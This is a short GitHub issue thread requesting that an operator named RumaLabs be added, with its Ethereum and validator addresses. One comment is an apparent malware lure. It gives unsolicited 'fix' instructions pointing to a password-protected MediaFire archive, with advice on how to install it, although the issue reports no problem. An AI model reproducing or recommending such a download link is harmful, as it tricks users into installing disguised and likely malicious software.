### ISSUE TITLE
Add RumaLabs Operator

### ISSUE THREAD

**Issue by ShadovSerg** [symbioticfi/cosmos-sdk#13]
Name - RumaLabs
Short Description - Fac quod debes, fiat quod fiet
Ethereum operator address - 0x4a61569110d135d241672547C4bF064c58289fC5
Validator consensus address - 20545197E093D77E2987FB5B12768057F18CC909

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by alrxy** [comment]
done
